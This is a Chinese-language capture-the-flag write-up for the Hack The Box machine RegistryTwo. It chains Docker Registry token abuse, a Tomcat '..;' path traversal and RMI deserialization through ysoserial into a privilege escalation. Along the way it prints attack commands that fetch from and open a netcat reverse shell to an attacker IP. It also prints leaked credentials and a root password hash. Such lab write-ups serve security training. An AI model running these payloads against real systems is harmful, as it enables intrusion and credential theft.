基本信息
- https://app.hackthebox.com/machines/RegistryTwo
- 10.10.11.223
data:image/s3,"s3://crabby-images/e1e75/e1e7533242f39aabc0a6aa244cbea26037a167bb" alt=""
端口扫描
22,443,5000,5001:
1 | nmap -sC -sV -Pn 10.10.11.223 |
443
需要加hosts:
1 | 10.10.11.223 www.webhosting.htb |
一个FREE WEB HOSTING:
data:image/s3,"s3://crabby-images/3bce7/3bce71e4d25b3173b7028d8317445edfc704520c" alt=""
5000/5001
5000直接访问是空白,5001是Acme auth server:
data:image/s3,"s3://crabby-images/1afae/1afaecb67f6e415c5cd94d648d3dc70e7dc27574" alt=""
因为5000端口是空白,搜索测试发现是Docker Registry:
- 5000 - Pentesting Docker Registry - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry
需要认证:
data:image/s3,"s3://crabby-images/80bd5/80bd5afa8d485e72cb5fbc63b459baa0a886f56c" alt=""
Docker Registry
5000需要认证,5001是auth server,那这两个应该是结合使用的,5001端口进行目录扫描发现auth端点:
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u "https://10.10.11.223:5001/" -k |
直接访问得到一个JWT:
data:image/s3,"s3://crabby-images/aeb38/aeb3868efd28ed57896081895932dba54a6bfc6c" alt=""
根据文档,5000端口使用这个token:
- Token Authentication Implementation | Docker Documentation
https://docs.docker.com/registry/spec/auth/jwt/
直接使用响应invalid_token,但响应信息中也给出了提示信息,service=”Docker registry”,scope=”registry:catalog:*”:
data:image/s3,"s3://crabby-images/7e2f0/7e2f062b4f3be3c340bce75900a6a056f96480ec" alt=""
_catalog
根据前面的响应信息修改auth请求,再次测试,得到hosting-app:
1 | https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:* |
data:image/s3,"s3://crabby-images/8769e/8769e89ba196b6d54a5ef5f615a262f6355b8daa" alt=""
hosting-app tags
然后就可以根据name生成对应token,再次请求,获取对应repo的tags:
1 | https://webhosting.htb:5001/auth?service=Docker+registry&scope=repository:hosting-app:pull |
data:image/s3,"s3://crabby-images/6ea71/6ea71f140c509fd7e52138b31e84b68a9cb23c7c" alt=""
##hosting-app manifest
同样修改请求,根据tag获取manifest:
1 | https://webhosting.htb:5000/v2/hosting-app/manifests/latest |
data:image/s3,"s3://crabby-images/e5cae/e5cae9f58c3089811f32ad9192a3e19246266906" alt=""
DockerRegistryGrabber
然后就可以使用已经获得的信息,修改DockerRegistryGrabber,dump对应镜像:
- Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber
删除代码里的用户名密码选项,设置代理让脚本流量走burp,然后burp添加一条规则添加认证头:
data:image/s3,"s3://crabby-images/20cf2/20cf25227dfa79284ef4ba9f0d4e6003277823fc" alt=""
修改后即可dump对应镜像:
1 | export ALL_PROXY=http://127.0.0.1:8080 |
data:image/s3,"s3://crabby-images/925b5/925b5b033368710fa31593aad3927930fcf33f34" alt=""
data:image/s3,"s3://crabby-images/5b1e5/5b1e5f16e80776f1b88106af3a5ecc614ee1b079" alt=""
hosting-app
得到的其中一个压缩包中,得到一个tomcat war包:
1 | 4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42.tar.gz |
data:image/s3,"s3://crabby-images/d082b/d082b0f45e282ddd5427ea383791544875115dc9" alt=""
reconfigure
根据代码,需要session中有s_IsLoggedInUserRoleManager才能进入reconfigure,而又因为是nginx加tomcat的搭配,可以利用这种方式进入session页面:
- Tomcat - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat#path-traversal-.. - Breaking Parser Logic - Take Your Path Normalization Off and Pop 0days Out
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
1 | hosting/WEB-INF/classes/com/htb/hosting/services/ConfigurationServlet.class |
data:image/s3,"s3://crabby-images/8db64/8db6446124f55663246f8a69785a00cab5d4258b" alt=""
1 | https://www.webhosting.htb/hosting/..;/examples/servlets/servlet/SessionExample |
data:image/s3,"s3://crabby-images/51761/51761527daba50cae78e7692961b683f7add0129" alt=""
所以可以自己设置s_IsLoggedInUserRoleManager,然后进入reconfigure页面:
data:image/s3,"s3://crabby-images/20f8d/20f8d8faa6f10f787efea7dd033510133762ef64" alt=""
提交修改,可以任意添加参数,例如修改mysql.host可以收到请求:
data:image/s3,"s3://crabby-images/627a8/627a825cf580c4d7b215c1a2f5a192dee8be2368" alt=""
data:image/s3,"s3://crabby-images/9cdc8/9cdc89534c4c919fce70d6aba14ad31608610f8f" alt=""
EditFileSessionManager LFI
另外EditFileSessionManager中可以知道编辑文件也是通过session,并且得到session name格式:
1 | hosting/WEB-INF/classes/com/htb/hosting/utils/edits/EditFileSessionManager.class |
data:image/s3,"s3://crabby-images/217b2/217b22c57ed232d9d5c00e8be685e8087f41dc70" alt=""
结合hosts那边得到的文件名修改session对应的实际文件路径值,可以达成LFI效果(实际上后面也没用到这部分):
data:image/s3,"s3://crabby-images/447ce/447cee8e3e6b601ee593706efca75b55dc1d0af4" alt=""
data:image/s3,"s3://crabby-images/f8863/f8863ef92f8c9f1d3887cf81040b9cd0b0817ef0" alt=""
/etc/hosting.ini
Hosting.ini中可以得到mysql密码(也是一样,后面不需要这部分):
1 | Mon Jan 30 21:05:01 GMT 2023 |
RMI
代码中也可以发现RMI相关的:
1 | hosting/WEB-INF/classes/com/htb/hosting/rmi/RMIClientWrapper.class |
data:image/s3,"s3://crabby-images/3ce32/3ce3233c19e801c6b1bbe4b4e24808090d5bca1f" alt=""
存在简单的校验,基础的00即可绕过:
data:image/s3,"s3://crabby-images/d8646/d864699ee1b65c666eec14b553b6a5cc71481f2f" alt=""
data:image/s3,"s3://crabby-images/102a8/102a8747e123cfdebe3668ca9767f90244b77c2c" alt=""
RMI shell
现在的场景是我们能够控制rmi server,那就可以向客户端发送恶意数据打反序列化:
- Java RMI 攻击由浅入深 | 素十八
https://su18.org/post/rmi-attack/ - qtc-de/remote-method-guesser: Java RMI Vulnerability Scanner
https://github.com/qtc-de/remote-method-guesser#listen
简单测试发现可以执行命令(没有curl那些,wget可以):
1 | java -jar rmg-4.4.1-jar-with-dependencies.jar listen --yso ysoserial-master-SNAPSHOT.jar 10.10.14.7 9002 CommonsCollections6 'wget 10.10.14.7:7777/test' |
data:image/s3,"s3://crabby-images/2684c/2684c11319d83a0a3239391abe11340a64078542" alt=""
data:image/s3,"s3://crabby-images/6accb/6accbcae80ede78fdd7268515e4d7ffb5922a6ab" alt=""
reverse shell
有nc并且支持-e
参数,直接reverse shell,打到app用户,在一个docker容器中,app用户并不能ssh登录,后续操作还是只能通过这个reverse shell:
1 | java -jar rmg-4.4.1-jar-with-dependencies.jar listen --yso ysoserial-master-SNAPSHOT.jar 10.10.14.7 9002 CommonsCollections6 'nc 10.10.14.7 4444 -e /bin/bash' |
data:image/s3,"s3://crabby-images/9d738/9d738231d424d5f2e53f1cf8982682ca68691152" alt=""
RMIClient
前面可以看到rmi连接registry.webhosting.htb,查看hosts可以知道这是本地服务:
data:image/s3,"s3://crabby-images/b5c83/b5c8301e332adee9e3d7a3af5451a396d172cabc" alt=""
需要自己写一个RMIClient来利用Fileservice查看目录,读取文件,代码附在后面了,注意包名需要一致,其他代码就是直接复制,RMIClientWrapper简单改一下去掉setting那些,直接指定host和端口,然后自定义RMIClient,第一个参数用到的vhost id是自己在443端口主站创建domain后分配的id,list用来查看目录,view用来读取文件,从/etc/passwd知道developer用户,然后再去看对应目录,最终得到一组账号密码:
(view函数有重载,可以不写vhostid,这样文件名需要是加密的,直接用CryptUtil就行)
1 | https://irogir:qybWiMTRg0sIHz4beSTUzrVIl7t3YsCj9@github.com |
data:image/s3,"s3://crabby-images/0b037/0b0370c412785be68041903430ee773728f52d78" alt=""
data:image/s3,"s3://crabby-images/1cbdb/1cbdbf3c6b8c103a5d21ae80b788d715ee286ddf" alt=""
RMIClient
1 | package com.htb.hosting.rmi; |
user flag
得到的密码就是developer用户密码,直接ssh登录:
data:image/s3,"s3://crabby-images/734e6/734e61eebcf7d0bbea37e9a3e7ffa09454b60917" alt=""
quarantine
简单枚举发现两个jar,registry.jar是rmi server,其中还提供了quarantine registry,quarantine.jar会去调用它:
1 | /opt/registry.jar |
分析代码可以知道quarantine registry只有一个用来获取配置信息的函数,quarantine.jar使用clamav根据获取到的配置信息进行操作:
data:image/s3,"s3://crabby-images/a4c9e/a4c9e2d80cd068030169d6856d84ef7dee0917eb" alt=""
data:image/s3,"s3://crabby-images/62d68/62d68954df3f759096a7a683c532d9a7a98edf02" alt=""
根据代码,大概流程就是quarantine.jar从rmi获取配置信息,使用clamav对monitorDirectory进行相关操作,目标目录是quarantineDirectory
那如果我们能够控制提供的配置信息呢,就可以尝试任意输入目录和输出目录
并且根据代码,源文件路径信息会通过socket发到配置文件中指定的server,所以host也改为我们自己的,开启监听,来根据接收到的信息获取输入目录中的文件名:
data:image/s3,"s3://crabby-images/cf130/cf130354e33fcc3a20fcd32008f29a4f6e1639fb" alt=""
rmi server 劫持
修改代码,只需要修改QuarantineServiceImpl中提供的参数即可:
1 | private static final QuarantineConfiguration DEFAULT_CONFIG = new QuarantineConfiguration(new File("/tmp/miao"), new File("/root"), "10.10.14.7", 3310, 1000); |
然后因为原本服务在运行中,使用while循环尝试进行劫持:
1 | target |
等待劫持服务成功,并且等待root自动运行quarantine.jar获取我们修改后的配置:
data:image/s3,"s3://crabby-images/b93fe/b93feb822f74431efaace193d14cd3d5cb03c862" alt=""
我们的监听中也到了源目录中的文件路径:
data:image/s3,"s3://crabby-images/b20f8/b20f82233c465fc83478341364160f9b5df4acc4" alt=""
然后就能够在我们修改的目标目录中得到修改的monitorDirectory中的文件,同样是在.git-credentials文件中得到密码:
1 | zSCAN /root/.git-credentialsConnection from 10.10.11.223:51204 |
data:image/s3,"s3://crabby-images/83024/83024944eda70b12503102c3796b0c32c7e5fc19" alt=""
root flag
得到的密码切换到root:
data:image/s3,"s3://crabby-images/e92d9/e92d95106a86f1bffda40bab7e5ab978df978cee" alt=""
shadow
1 | root:$6$13hvGW.I$YCuyWm/Tie7PQpD00mvvjyRKAzUEOuE.ULQ/UvZkfnMi4fN2Vt2SnWO2GPKqfEwRvAXbFQ1TG1JpbC1b261T9/:19390:0:99999:7::: |
参考资料
- 5000 - Pentesting Docker Registry - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry - Token Authentication Implementation | Docker Documentation
https://docs.docker.com/registry/spec/auth/jwt/ - Syzik/DockerRegistryGrabber: Enumerate / Dump Docker Registry
https://github.com/Syzik/DockerRegistryGrabber - Tomcat - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat#path-traversal-.. - Breaking Parser Logic - Take Your Path Normalization Off and Pop 0days Out
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - Java RMI 攻击由浅入深 | 素十八
https://su18.org/post/rmi-attack/ - qtc-de/remote-method-guesser: Java RMI Vulnerability Scanner
https://github.com/qtc-de/remote-method-guesser#listen